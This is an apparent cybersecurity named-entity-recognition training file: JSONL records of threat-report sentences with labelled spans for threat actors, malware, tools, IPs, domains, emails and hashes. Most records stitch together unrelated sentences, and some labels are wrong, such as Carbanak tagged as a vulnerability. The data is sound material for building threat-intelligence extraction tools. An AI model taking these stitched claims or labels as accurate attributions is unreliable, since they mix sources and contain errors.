{"text": "Moreover , as we dived deeper into the investigation , we discovered several spyware tools for Windows that form an implant for exfiltrating sensitive data on a targeted machine . The main delivery method of this type of backdoor is spear phishing emails or spam that uses social engineering to manipulate targets into enabling malicious documents . Cobalt Group has mainly targeted banks in Eastern Europe , Central Asia , and Southeast Asia .", "spans": {"SYSTEM: Windows": [[95, 102]], "MALWARE: backdoor": [[221, 229]], "THREAT_ACTOR: Cobalt Group": [[350, 362]]}, "info": {"id": "cyberner_stix_train_002975", "source": "cyberner_stix_train"}}
{"text": "Of course , I had to investigate further .", "spans": {}, "info": {"id": "cyberner_stix_train_002976", "source": "cyberner_stix_train"}}
{"text": "] pw/6 * * * * * 5 ” ( It . \bFireEye assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper . The first task of the malware is to generate an ID to identify the infected system .", "spans": {"ORGANIZATION: \bFireEye": [[28, 36]], "THREAT_ACTOR: actors": [[53, 59]], "THREAT_ACTOR: TEMP.Reaper": [[144, 155]]}, "info": {"id": "cyberner_stix_train_002977", "source": "cyberner_stix_train"}}
{"text": "The source process checks the mapping between a process id and a process name . Using the Kaspersky Security Network ( KSN ) and artifacts from malware files and attack sites , we were able to trace the attacks back to March 2015 . They used legitimate infrastructure—the ability to post or create comments on forums and profile pages—to embed a string that the malware would decode to find and communicate with the true C2 IP address . These URLs provide access to the C2s , which then provide potential commands and encrypted transfers of additional backdoors onto the system via GIF files .", "spans": {"ORGANIZATION: Kaspersky Security Network": [[90, 116]], "ORGANIZATION: KSN": [[119, 122]], "TOOL: C2": [[421, 423]]}, "info": {"id": "cyberner_stix_train_002978", "source": "cyberner_stix_train"}}
{"text": "China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool . At first glance CONFUCIUS_B looks very similar to CONFUCIUS_A , and they are also packaged in plain SFX binary files .", "spans": {"MALWARE: China Chopper": [[0, 13]], "THREAT_ACTOR: attackers": [[36, 45]], "FILEPATH: CONFUCIUS_B": [[190, 201]], "FILEPATH: CONFUCIUS_A": [[224, 235]], "MALWARE: SFX binary files": [[274, 290]]}, "info": {"id": "cyberner_stix_train_002979", "source": "cyberner_stix_train"}}
{"text": "EventBot uses this permission in order to achieve persistence and run in the background as a service . We can observe that the sample is very recent , created on Thursday , July 4 While this may be coincidental , the out-of-sequence version 3.0 sample was created ten days after we published the Operation Lotus Blossom paper that exposed the Elise Trojan that is closely related to Emissary .", "spans": {"MALWARE: EventBot": [[0, 8]], "MALWARE: sample": [[127, 133]], "MALWARE: Elise Trojan": [[343, 355]], "MALWARE: Emissary": [[383, 391]]}, "info": {"id": "cyberner_stix_train_002980", "source": "cyberner_stix_train"}}
{"text": "More importantly , the IP address this certificate was shared with 213.251.187.145 was previously identified as used by Sofacy Group for phishing attacks against Albanian government institutions by registering the domain qov.al and creating realistic subdomains to lure victims into visiting .", "spans": {"IP_ADDRESS: 213.251.187.145": [[67, 82]], "THREAT_ACTOR: Sofacy": [[120, 126]], "DOMAIN: qov.al": [[221, 227]]}, "info": {"id": "cyberner_stix_train_002981", "source": "cyberner_stix_train"}}
{"text": "As on the desktop , mobile users need to be wary of installing applications from outside of legitimate app stores and sources and be on the lookout for bogus banking sites that ask for more information than users would normally provide on legitimate sites . As an example , specific CIA malware revealed in Year Zero is able to penetrate , infest and control both the Android phone and iPhone software that runs or has run presidential Twitter accounts . Dragonfly is a cyber espionage group that has been active since at least 2011 .", "spans": {"THREAT_ACTOR: CIA": [[283, 286]], "TOOL: malware": [[287, 294]], "THREAT_ACTOR: Dragonfly": [[455, 464]]}, "info": {"id": "cyberner_stix_train_002982", "source": "cyberner_stix_train"}}
{"text": "] plus/Updates/tt/parser.apk The payload can be a .dex or .apk file which is a Java-compiled Android executable . The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . Stolen Pencil is a threat group likely originating from DPRK that has been active since at least May 2018 .", "spans": {"SYSTEM: Android": [[93, 100]], "MALWARE: malware": [[118, 125]], "TOOL: CMD/PowerShell": [[154, 168]], "THREAT_ACTOR: attackers": [[186, 195]], "THREAT_ACTOR: Stolen Pencil": [[284, 297]]}, "info": {"id": "cyberner_stix_train_002983", "source": "cyberner_stix_train"}}
{"text": "REQUEST_COMPANION_RUN_IN_BACKGROUND - let the app run in the background . As described in the infection flow , one of the first uses of the AutoHotKey scripts is to upload a screenshot from the compromised PC . The timeline in Figure 2 shows that the Emissary Trojan was first created ( version 1.0 ) in May 2009 and quickly received an update that resulted in version 1.1 in June 2009 .", "spans": {"MALWARE: AutoHotKey scripts": [[140, 158]], "MALWARE: Emissary Trojan": [[251, 266]]}, "info": {"id": "cyberner_stix_train_002984", "source": "cyberner_stix_train"}}
{"text": "This strongly suggested that the banking Trojans , despite differing in terms of capability , belong to the same family . TG-3390 operates a broad and long-running campaign of SWCs and has compromised approximately 100 websites as of this publication . Based on the samples we collected and traced to 456 distinct IPs , we expect the group to be more active in the coming months as we observed changes on the versions we acquired . PIEHOP utilizes LIGHTWORK to issue the IEC-104 commands \" ON \" or \" OFF \" to the remote system and then immediately deletes the executable after issuing the command .", "spans": {"THREAT_ACTOR: TG-3390": [[122, 129]], "TOOL: PIEHOP": [[432, 438]], "TOOL: LIGHTWORK": [[448, 457]]}, "info": {"id": "cyberner_stix_train_002985", "source": "cyberner_stix_train"}}
{"text": "Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . After monitoring and correlating the APT attack , 360 Threat Intelligence Center discovered multiple related emails to attack Colombian government agencies , financial institutions and large enterprises .", "spans": {"MALWARE: Mimikatz": [[0, 8]], "ORGANIZATION: 360 Threat Intelligence Center": [[155, 185]], "TOOL: emails": [[214, 220]], "ORGANIZATION: government agencies": [[241, 260]], "ORGANIZATION: financial institutions": [[263, 285]], "ORGANIZATION: enterprises": [[296, 307]]}, "info": {"id": "cyberner_stix_train_002986", "source": "cyberner_stix_train"}}
{"text": "Parsing of instructions by EventBot Parsing of instructions by the bot from the C2 . 'Improvise' is a toolset for configuration , post-processing , payload setup and execution vector selection for survey/exfiltration tools supporting all major operating systems like Windows (Bartender) , MacOS (JukeBox) and Linux (DanceFloor) . Since at least 2014 , an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran .", "spans": {"MALWARE: EventBot": [[27, 35]], "MALWARE: 'Improvise'": [[85, 96]], "ORGANIZATION: FireEye": [[387, 394]], "THREAT_ACTOR: APT34": [[398, 403]]}, "info": {"id": "cyberner_stix_train_002987", "source": "cyberner_stix_train"}}
{"text": "sahro.bella7@post.cz trala.cosh2@post.cz bishtr.cam47@post.cz lobrek.chizh@post.cz cervot.woprov@post.cz .", "spans": {"EMAIL: sahro.bella7@post.cz": [[0, 20]], "EMAIL: trala.cosh2@post.cz": [[21, 40]], "EMAIL: bishtr.cam47@post.cz": [[41, 61]], "EMAIL: lobrek.chizh@post.cz": [[62, 82]], "EMAIL: cervot.woprov@post.cz": [[83, 104]]}, "info": {"id": "cyberner_stix_train_002988", "source": "cyberner_stix_train"}}
{"text": "In early 2017 , APT10 began conducting attacks against global managed IT service providers (MSPs) that granted them unprecedented access to MSPs and their customers’ networks . Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 .", "spans": {"THREAT_ACTOR: APT10": [[16, 21]], "ORGANIZATION: IT service": [[70, 80]], "ORGANIZATION: (MSPs)": [[91, 97]], "ORGANIZATION: Kaspersky Lab": [[177, 190]], "ORGANIZATION: Microsoft Office": [[214, 230]], "VULNERABILITY: exploits": [[231, 239]], "FILEPATH: Exploit.MSWord.CVE-2010-333": [[287, 314]], "FILEPATH: Exploit.Win32.CVE-2012-0158": [[317, 344]]}, "info": {"id": "cyberner_stix_train_002989", "source": "cyberner_stix_train"}}
{"text": "Malware Features Android According to the observed samples and their signatures , early versions of this Android malware were developed by the end of 2014 and the campaign has remained active ever since . First stage infections and graphical decoys have been described by multiple sources , including in our previous research MuddyWater expands operations . Reporting indicates there may be links between Cobalt Group and both the malware Carbanak and the group Carbanak .", "spans": {"SYSTEM: Android": [[17, 24], [105, 112]], "THREAT_ACTOR: MuddyWater": [[326, 336]], "THREAT_ACTOR: Cobalt Group": [[405, 417]], "MALWARE: Carbanak": [[439, 447]], "THREAT_ACTOR: Carbanak": [[462, 470]]}, "info": {"id": "cyberner_stix_train_002990", "source": "cyberner_stix_train"}}
{"text": "SHA256 : c885f09b10feb88d7d176fe1a01ed8b480deb42324d2bb825e96fe1408e2a35f .", "spans": {"FILEPATH: c885f09b10feb88d7d176fe1a01ed8b480deb42324d2bb825e96fe1408e2a35f": [[9, 73]]}, "info": {"id": "cyberner_stix_train_002991", "source": "cyberner_stix_train"}}
{"text": "Operation RussianDoll : Adobe & Windows Zero-Day Exploits Likely Leveraged by Russia ’s APT28 in Highly-Targeted Attack .", "spans": {"TOOL: Adobe": [[24, 29]], "SYSTEM: Windows": [[32, 39]], "VULNERABILITY: Zero-Day": [[40, 48]], "THREAT_ACTOR: APT28": [[88, 93]]}, "info": {"id": "cyberner_stix_train_002992", "source": "cyberner_stix_train"}}
{"text": "Adware commonly found on Play collects profits from ad networks , but mobile ransomware inflicts direct harm to users . In the same year , they conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans . They also use AutoIT droppers , password-protected EXE files and even ISO images . CSP can define a list of domains that the browser should be allowed to interact with for the visited URL .", "spans": {"TOOL: Perl IRC bot": [[177, 189]], "TOOL: public IRC chats": [[194, 210]], "TOOL: AutoIT": [[246, 252]], "TOOL: EXE": [[283, 286]], "TOOL: ISO": [[302, 305]], "SYSTEM: CSP": [[315, 318]]}, "info": {"id": "cyberner_stix_train_002993", "source": "cyberner_stix_train"}}
{"text": "By pivoting off of one sample we were able to zoom out and identify a sizable infrastructure of what appears to be 707 IP ’s and 2,611 domains being utilized for malicious activity .", "spans": {}, "info": {"id": "cyberner_stix_train_002994", "source": "cyberner_stix_train"}}
{"text": "Apps not selected as protected apps stop working once the screen is off and await re-activation , so the implant is able to determine that it is running on a Huawei device and add itself to this list . However , as this recent campaign indicates , the NewsBeef APT appears to have shifted its intrusion toolset away from BeEF and towards macro-enabled malicious Office documents , PowerSploit , and Pupy . The group has been observed targeting healthcare , telecom , technology , and video game industries in 14 countries .", "spans": {"ORGANIZATION: Huawei": [[158, 164]], "THREAT_ACTOR: NewsBeef": [[252, 260]], "TOOL: Office documents": [[362, 378]], "TOOL: PowerSploit": [[381, 392]], "TOOL: Pupy": [[399, 403]]}, "info": {"id": "cyberner_stix_train_002995", "source": "cyberner_stix_train"}}
{"text": "The Trojan waits for incoming SMS messages ( the “ alarmReceiver.class ” ) and checks whether these messages contain one of the following commands : “ sms ” , “ contact ” , “ location ” , “ other ” . Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 . Wingbird , the advanced malware used by NEODYMIUM , has several behaviors that trigger alerts in Windows Defender ATP .", "spans": {"MALWARE: malicious.DOC": [[286, 299]], "VULNERABILITY: Microsoft Common Controls vulnerability": [[319, 358]], "VULNERABILITY: CVE-2012-0158": [[361, 374]], "MALWARE: Wingbird": [[377, 385]], "THREAT_ACTOR: NEODYMIUM": [[417, 426]], "ORGANIZATION: Windows Defender ATP": [[474, 494]]}, "info": {"id": "cyberner_stix_train_002996", "source": "cyberner_stix_train"}}
{"text": "Check Point researchers discovered another widespread malware campaign on Google Play , Google ’ s official app store . Based on multiple active compromises by the Axiom threat group , Novetta was able to capture and analyze new Winnti malware samples . The target file is loaded using the LoadLibrary API function , and the address of the exported function zxMain is obtained with GetProcAddress . Ransomware gangs are consistently rebranding or merging with other groups , as highlighted in our 2022 Year in Review , or these actors work for multiple ransomware - as - a - service ( RaaS ) outfits at a time , and new groups are always emerging .", "spans": {"ORGANIZATION: Check Point": [[0, 11]], "SYSTEM: Google Play": [[74, 85]], "ORGANIZATION: Google": [[88, 94]], "ORGANIZATION: Novetta": [[185, 192]], "TOOL: Winnti malware samples": [[229, 251]], "MALWARE: ransomware - as - a - service ( RaaS )": [[553, 591]]}, "info": {"id": "cyberner_stix_train_002997", "source": "cyberner_stix_train"}}
{"text": "CTU researchers have observed TG-3390 actors staging RAR archives , renamed with a .zip file extension , on externally accessible web servers .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-3390": [[30, 37]], "TOOL: RAR": [[53, 56]], "FILEPATH: .zip": [[83, 87]]}, "info": {"id": "cyberner_stix_train_002998", "source": "cyberner_stix_train"}}
{"text": ") Upload and purge collected evidence Destroy device by resetting locking password Execute shell commands Send SMS with defined content or location Disable network Disable root Uninstall bot To avoid detection and removal of the agent app in the device memory , the RCSAndroid suite also detects emulators or sandboxes , obfuscates code using DexGuard , uses ELF string obfuscator , and adjusts the OOM ( out-of-memory ) value . Flying Kitten was one of the first groups to be described as a coherent threat actor conducting operations against political opponents of government and foreign espionage targets . Unflattening the code in later maturity levels like MMAT_GLBOPT1 and MMAT_GLBOPT2 ( first and second pass of global optimization ) s determines offsets within files for encryption to control encryption speed .", "spans": {"MALWARE: RCSAndroid": [[266, 276]], "SYSTEM: DexGuard": [[343, 351]], "THREAT_ACTOR: Flying Kitten": [[429, 442]], "THREAT_ACTOR: groups": [[464, 470]], "THREAT_ACTOR: threat actor": [[501, 513]], "ORGANIZATION: government": [[567, 577]], "THREAT_ACTOR: espionage": [[590, 599]], "TOOL: MMAT_GLBOPT1": [[662, 674]], "TOOL: MMAT_GLBOPT2": [[679, 691]]}, "info": {"id": "cyberner_stix_train_002999", "source": "cyberner_stix_train"}}
{"text": "Our researchers examined the domain that hosted the first malicious file , mol.com-ho.me .", "spans": {"DOMAIN: mol.com-ho.me": [[75, 88]]}, "info": {"id": "cyberner_stix_train_003000", "source": "cyberner_stix_train"}}
{"text": "Analysis indicates there are currently two distinct variants of ViperRAT . Continued WhiteBear activity later shifted to include defense-related organizations into June 2017 . On a Windows machine , the netsvc group contains names of both existing and non-existing services . $ HOME / Library / LaunchAgents / com.studentd.agent.plist", "spans": {"MALWARE: ViperRAT": [[64, 72]], "ORGANIZATION: defense-related organizations": [[129, 158]], "SYSTEM: Windows": [[181, 188]], "TOOL: netsvc": [[203, 209]]}, "info": {"id": "cyberner_stix_train_003001", "source": "cyberner_stix_train"}}
{"text": "] XXXX [ . While investigating the domains and infrastructure used by the phishing components of Gorgon Group , Unit 42 researchers witnessed several common operational security flaws with Gorgon Group 's actors throughout their many campaigns . And the last change that was introduced in regards to ConfuserEx obfuscator , an obfuscator that is very commonly used by malicious actors to obfuscate .NET code , is used with various levels of obfuscation , anti - tampering and anti - debugging , which makes the unpacking more difficult for malware researchers .", "spans": {"THREAT_ACTOR: Gorgon Group": [[97, 109]], "ORGANIZATION: Unit 42": [[112, 119]], "THREAT_ACTOR: Gorgon Group 's actors": [[189, 211]], "TOOL: ConfuserEx": [[300, 310]], "THREAT_ACTOR: malicious actors": [[368, 384]], "MALWARE: .NET code": [[398, 407]]}, "info": {"id": "cyberner_stix_train_003002", "source": "cyberner_stix_train"}}
{"text": "Unit 74455 's members would be responsible for the distribution of some of the stolen data from the breaches through the \" DCLeaks \" and \" Guccifer 2.0 \" websites .", "spans": {"THREAT_ACTOR: Unit 74455": [[0, 10]], "THREAT_ACTOR: DCLeaks": [[123, 130]], "THREAT_ACTOR: Guccifer": [[139, 147]]}, "info": {"id": "cyberner_stix_train_003003", "source": "cyberner_stix_train"}}
{"text": "To show how this breach and similar breaches can be mitigated , we look at how Windows Defender Advanced Threat Protection ( Windows Defender ATP ) flags activities associated with BARIUM , LEAD , and other known activity groups and how it provides extensive threat intelligence about these groups .", "spans": {"TOOL: Windows Defender Advanced Threat Protection": [[79, 122]], "TOOL: Windows Defender ATP": [[125, 145]], "THREAT_ACTOR: BARIUM": [[181, 187]], "THREAT_ACTOR: LEAD": [[190, 194]]}, "info": {"id": "cyberner_stix_train_003004", "source": "cyberner_stix_train"}}
{"text": "This malware has used the IP S-PROT addresses identified in the accompanying .csv and .stix files as both source and destination IPs .", "spans": {"TOOL: IP S-PROT addresses": [[26, 45]], "FILEPATH: .csv": [[77, 81]], "FILEPATH: .stix": [[86, 91]], "TOOL: IPs": [[129, 132]]}, "info": {"id": "cyberner_stix_train_003005", "source": "cyberner_stix_train"}}
{"text": "] com hxxp : //www [ . FireEye has moderate confidence that a campaign targeting the hospitality sector is attributed to Russian actor APT28 . It should be noted that out of the roughly 180 Word variants that were located by Carbon Black , the biggest difference in the documents was the metadata and junk data located in the malicious macros . However , we note that the wiper deployment was limited to the victim ’s IT environment and did not impact the hypervisor or the SCADA virtual machine .", "spans": {"ORGANIZATION: FireEye": [[23, 30]], "ORGANIZATION: hospitality sector": [[85, 103]], "THREAT_ACTOR: actor APT28": [[129, 140]], "TOOL: Word": [[190, 194]], "ORGANIZATION: Carbon Black": [[225, 237]], "SYSTEM: SCADA virtual machine": [[474, 495]]}, "info": {"id": "cyberner_stix_train_003006", "source": "cyberner_stix_train"}}
{"text": "We have been able to tie the malware to a long-running Facebook profile that we observed promoting the first stage of this family , a malicious chat application called Dardesh via links to Google Play . We are confident this KillDisk malware was deployed by Lazarus , rather than by another , unrelated attacker . Despite what the gateway does, this attack would only succeed if the message got through the gateway and a particular archive utility is used by the end-user, such as certain versions of PowerArchiver , WinRar , and older 7Zip as described . The new exploit method bypasses URL rewrite mitigations for the endpoint provided by Microsoft in response to •", "spans": {"ORGANIZATION: Facebook": [[55, 63]], "MALWARE: Dardesh": [[168, 175]], "SYSTEM: Google Play": [[189, 200]], "TOOL: KillDisk malware": [[225, 241]], "THREAT_ACTOR: Lazarus": [[258, 265]], "THREAT_ACTOR: attacker": [[303, 311]], "TOOL: PowerArchiver": [[501, 514]], "TOOL: WinRar": [[517, 523]], "TOOL: 7Zip": [[536, 540]], "ORGANIZATION: Microsoft": [[641, 650]]}, "info": {"id": "cyberner_stix_train_003007", "source": "cyberner_stix_train"}}
{"text": "Another interesting ZeroT sample ( SHA256 bc2246813d7267608e1a80a04dac32da9115a15b1550b0c4842b9d6e2e7de374 ) contained the executable 0228.exe and a decoy document 0228.doc in the RAR SFX archive .", "spans": {"MALWARE: ZeroT": [[20, 25]], "FILEPATH: bc2246813d7267608e1a80a04dac32da9115a15b1550b0c4842b9d6e2e7de374": [[42, 106]], "FILEPATH: 0228.exe": [[134, 142]], "FILEPATH: 0228.doc": [[164, 172]], "TOOL: RAR": [[180, 183]], "TOOL: SFX": [[184, 187]]}, "info": {"id": "cyberner_stix_train_003008", "source": "cyberner_stix_train"}}
{"text": "Such data includes contact and location information , phone and message activity , the ability to record from the microphone , camera , and other sensors as well as the capability to access data from many popular messaging and social media apps . APT41 has targeted payment services specializing in handling in-game transactions and real money transfer (RMT) purchases . This neatly ties together many of the tools used by the Dukes group , as versions of this one loader have been used to load malware from three different Dukes-related toolsets CosmicDuke , PinchDuke , and MiniDuke – over the course of five years .", "spans": {"THREAT_ACTOR: APT41": [[247, 252]], "ORGANIZATION: payment services": [[266, 282]], "THREAT_ACTOR: Dukes group": [[427, 438]], "MALWARE: CosmicDuke": [[547, 557]], "MALWARE: PinchDuke": [[560, 569]], "MALWARE: MiniDuke": [[576, 584]]}, "info": {"id": "cyberner_stix_train_003009", "source": "cyberner_stix_train"}}
{"text": "] nampriknum [ . The malware samples deployed in both of these operations are updated versions of the KeyBoy backdoor first discussed in 2013 by Rapid7 . As the old saying goes : If it ain’t broke , don’t fix it . Fake browser updates are a very common decoy used by malware authors .", "spans": {"TOOL: KeyBoy backdoor": [[102, 117]], "ORGANIZATION: Rapid7": [[145, 151]], "MALWARE: Fake browser updates": [[214, 234]], "THREAT_ACTOR: malware authors": [[267, 282]]}, "info": {"id": "cyberner_stix_train_003010", "source": "cyberner_stix_train"}}
{"text": "Infection During installation , depending on the version of the Trojan , Asacub prompts the user either for Device Administrator rights or for permission to use AccessibilityService . One archive sample analyzed by CTU researchers contained a legitimate PDF file , a benign image of interest to targets ( see Figure 8 ) , and an HTTPBrowser installer disguised as an image file . We also found the init0 script running ; the script cleans out all miners regardless of its origin . Additionally , Mandiant was able to uncover additional infrastructure due to the fact that a PTR record was never changed from a previous operation .", "spans": {"MALWARE: Asacub": [[73, 79]], "ORGANIZATION: CTU": [[215, 218]], "TOOL: PDF file": [[254, 262]], "TOOL: HTTPBrowser installer": [[329, 350]], "FILEPATH: init0": [[398, 403]]}, "info": {"id": "cyberner_stix_train_003011", "source": "cyberner_stix_train"}}
{"text": "The Center for Experimental Mechanical Engineering develops weapons as well as military and special equipment .", "spans": {"ORGANIZATION: The Center for Experimental Mechanical Engineering": [[0, 50]]}, "info": {"id": "cyberner_stix_train_003012", "source": "cyberner_stix_train"}}
{"text": "Investigators found that John Podesta , Hillary Clinton ’s presidential campaign chairman , was one of thousands of individuals targeted in a mass phishing scheme using shortened URLs that security researchers attributed to APT28 .", "spans": {"THREAT_ACTOR: APT28": [[224, 229]]}, "info": {"id": "cyberner_stix_train_003013", "source": "cyberner_stix_train"}}
{"text": "By late 2015 , the malware ’ s creators had gone mostly silent until the summer of 2016 when the malware reappeared with a more complex architecture that injects malicious code into Android system processes . We have moderate confidence APT39 operations are conducted in support of Iranian national interests based on regional targeting patterns focused in the Middle East . will always produce the value -1 . Days later , KillNet claimed to target the European Investment Bank ( EIB ) .", "spans": {"SYSTEM: Android": [[182, 189]], "THREAT_ACTOR: APT39": [[237, 242]], "ORGANIZATION: European Investment Bank": [[453, 477]], "ORGANIZATION: EIB": [[480, 483]]}, "info": {"id": "cyberner_stix_train_003014", "source": "cyberner_stix_train"}}
{"text": "Through our investigation , we identified less than 3 dozen devices affected by Chrysaor , we have disabled Chrysaor on those devices , and we have notified users of all known affected devices . Analysis of RASPITE tactics , techniques , and procedures ( TTPs ) indicate the group has been active in some form since early - to mid-2017 . The payload code is started very early during the execution of the backdoored executable file . The gang attacked 10 victims last month , the majority of them being from the Information and Communications Technology ( ICT ) sectors .", "spans": {"MALWARE: Chrysaor": [[80, 88], [108, 116]], "THREAT_ACTOR: RASPITE": [[207, 214]], "THREAT_ACTOR: group": [[275, 280]], "ORGANIZATION: Information and Communications Technology ( ICT ) sectors": [[512, 569]]}, "info": {"id": "cyberner_stix_train_003015", "source": "cyberner_stix_train"}}
{"text": "BootComplete starts the AutoStartup service and the AutoStartup service makes sure that MainActivity is always running . To control ATMs , the group uses the Atmosphere Trojan , which is unique to Silence , or a program called xfs-disp.exe . However , even though the TTPs of the Cleaver team have some overlap to techniques used by Iranian Cyber Army , Ashiyane ( SQL injection ) and Syrian Electronic Army ( phishing ) , we believe this is largely the work of a new team .", "spans": {"THREAT_ACTOR: group": [[143, 148]], "TOOL: Atmosphere Trojan": [[158, 175]], "THREAT_ACTOR: Silence": [[197, 204]], "MALWARE: xfs-disp.exe": [[227, 239]], "THREAT_ACTOR: Cleaver": [[280, 287]], "THREAT_ACTOR: Cyber Army": [[341, 351]], "THREAT_ACTOR: Ashiyane": [[354, 362]], "ORGANIZATION: Syrian Electronic Army": [[385, 407]]}, "info": {"id": "cyberner_stix_train_003016", "source": "cyberner_stix_train"}}
{"text": "In the months leading up to August , the Sofacy group launched several waves of attacks relying on zero-day exploits in Microsoft Office , Oracle Sun Java , Adobe Flash Player and Windows itself .", "spans": {"THREAT_ACTOR: Sofacy": [[41, 47]], "VULNERABILITY: zero-day": [[99, 107]], "ORGANIZATION: Microsoft": [[120, 129]], "TOOL: Office": [[130, 136]], "TOOL: Oracle": [[139, 145]], "TOOL: Java": [[150, 154]], "TOOL: Adobe": [[157, 162]], "TOOL: Flash": [[163, 168]], "TOOL: Player": [[169, 175]], "SYSTEM: Windows": [[180, 187]]}, "info": {"id": "cyberner_stix_train_003017", "source": "cyberner_stix_train"}}
{"text": "We will also provide detailed analysis of the latest variants of the malware they deploy ( known as FakeM ) as well as other associated tools that allow Scarlet Mimic to target Android and OS X devices . We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers .", "spans": {"TOOL: FakeM": [[100, 105]], "THREAT_ACTOR: Scarlet Mimic": [[153, 166]], "MALWARE: Carbanak": [[224, 232]], "THREAT_ACTOR: criminals": [[299, 308]], "ORGANIZATION: financial industry": [[349, 367]], "ORGANIZATION: customers": [[391, 400]]}, "info": {"id": "cyberner_stix_train_003018", "source": "cyberner_stix_train"}}
{"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . attacks using this tool were still active as of April 2016 .", "spans": {"VULNERABILITY: Carbanak": [[20, 28]], "THREAT_ACTOR: criminals": [[95, 104]], "ORGANIZATION: financial industry": [[145, 163]], "ORGANIZATION: customers": [[187, 196]]}, "info": {"id": "cyberner_stix_train_003019", "source": "cyberner_stix_train"}}
{"text": "Moreover , BusyGasper boasts some keylogging tools – the malware processes every user tap , gathering its coordinates and calculating characters by matching given values with hardcoded ones . The campaign lasted from April to October and used job descriptions relevant to target organizations , in both English and Korean language . The email contained a malicious link to http://mynetwork.ddns.net:880 . UNC1878 has used various offensive security tools , most commonly Cobalt Strike BEACON , along with legitimate tools and built - in commands such as PSEXEC , WMI , and BITSadmin .", "spans": {"MALWARE: BusyGasper": [[11, 21]], "TOOL: email": [[337, 342]], "URL: http://mynetwork.ddns.net:880": [[373, 402]], "THREAT_ACTOR: UNC1878": [[405, 412]], "TOOL: Cobalt Strike BEACON": [[471, 491]], "TOOL: PSEXEC": [[554, 560]], "TOOL: WMI": [[563, 566]], "TOOL: BITSadmin": [[573, 582]]}, "info": {"id": "cyberner_stix_train_003020", "source": "cyberner_stix_train"}}
{"text": "With relevant visualized information , analysts are able to study malware behavior on impacted machines , so they can investigate further and plan out their response .", "spans": {"TOOL: relevant visualized information": [[5, 36]]}, "info": {"id": "cyberner_stix_train_003021", "source": "cyberner_stix_train"}}
{"text": "Next , the module enters an infinite loop .", "spans": {}, "info": {"id": "cyberner_stix_train_003022", "source": "cyberner_stix_train"}}
{"text": "In order to increase the likelihood of their malware successfully communicating home , cyber espionage threat actors are increasingly abusing legitimate web services , in lieu of DNS lookups to retrieve a command and control address . Malware used by the threat group can be configured to bypass network-based detection ; however , the threat actors rarely modify host-based configuration settings when deploying payloads .", "spans": {"MALWARE: Malware": [[235, 242]]}, "info": {"id": "cyberner_stix_train_003023", "source": "cyberner_stix_train"}}
{"text": "On September 12 , 2016 , the “ Fancy Bears ’ Hack Team ” persona claimed to have compromised WADA and released athletes ’ medical records as “ proof of American athletes taking doping. ”", "spans": {"THREAT_ACTOR: Fancy Bears": [[31, 42]], "ORGANIZATION: WADA": [[93, 97]]}, "info": {"id": "cyberner_stix_train_003024", "source": "cyberner_stix_train"}}
{"text": "Kill switches are used by many malware authors to remove traces from a device after a successful operation . APT28 is using novel techniques involving the EternalBlue exploit and the open source tool Responder to spread laterally through networks and likely target travelers . In a number of the cases we analyzed , ProjectSauron deployed malicious modules inside the custom network encryption 's software directory , disguised under similar filenames and accessing the data placed beside its own executable .", "spans": {"THREAT_ACTOR: APT28": [[109, 114]], "VULNERABILITY: EternalBlue exploit": [[155, 174]], "TOOL: open source tool": [[183, 199]], "TOOL: Responder": [[200, 209]], "MALWARE: ProjectSauron": [[316, 329]], "MALWARE: malicious modules": [[339, 356]]}, "info": {"id": "cyberner_stix_train_003025", "source": "cyberner_stix_train"}}
{"text": "The messages looked as follows : “ % USERNAME % , ti ho inviato il soldi sul subito subito-a [ . \bTrend Micro attributes this activity to MuddyWater , an Iran-nexus actor that has been active since at least May 2017 . The fake svchost binary is the KONNI malware .", "spans": {"ORGANIZATION: \bTrend Micro": [[97, 109]], "THREAT_ACTOR: MuddyWater": [[138, 148]], "THREAT_ACTOR: actor": [[165, 170]], "MALWARE: KONNI": [[249, 254]]}, "info": {"id": "cyberner_stix_train_003026", "source": "cyberner_stix_train"}}
{"text": "[27089,28618,9833,4170,25722,19977,2369,21426,3435,7442,30146,21719,16140,16280,16688,22550,19867,194,3298] .", "spans": {}, "info": {"id": "cyberner_stix_train_003027", "source": "cyberner_stix_train"}}
{"text": "One of the samples ( e19823a1ba4a0e40cf459f4a0489fc257720cc0d71ecfb7ad94b3ca86fbd85d1 ) uses the C2 server svcws [ . In April 2013 , a year after we found the \" bodiless \" Lurk module , the Russian cybercriminal underground exploited several families of malicious software that specialized in attacks on banking software . The value name of this entry varies from sample to sample . Initial access brokers use tools like NetSupport RAT to gather information and perform additional actions on victims of interest .", "spans": {"TOOL: Lurk module": [[172, 183]], "TOOL: NetSupport RAT": [[421, 435]]}, "info": {"id": "cyberner_stix_train_003028", "source": "cyberner_stix_train"}}
{"text": "Because CVE-2015-3043 is already patched , this remote exploit will not succeed on a fully patched system .", "spans": {"VULNERABILITY: CVE-2015-3043": [[8, 21]]}, "info": {"id": "cyberner_stix_train_003029", "source": "cyberner_stix_train"}}
{"text": "In their current campaign , APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros . Initial intrusion stages feature the Win32/Barlaiy implant—notable for its use of social network profiles , collaborative document editing sites , and blogs for C&C .", "spans": {"THREAT_ACTOR: APT32": [[28, 33]], "MALWARE: ActiveMime files": [[48, 64]], "MALWARE: Win32/Barlaiy": [[185, 198]], "TOOL: C&C": [[309, 312]]}, "info": {"id": "cyberner_stix_train_003030", "source": "cyberner_stix_train"}}
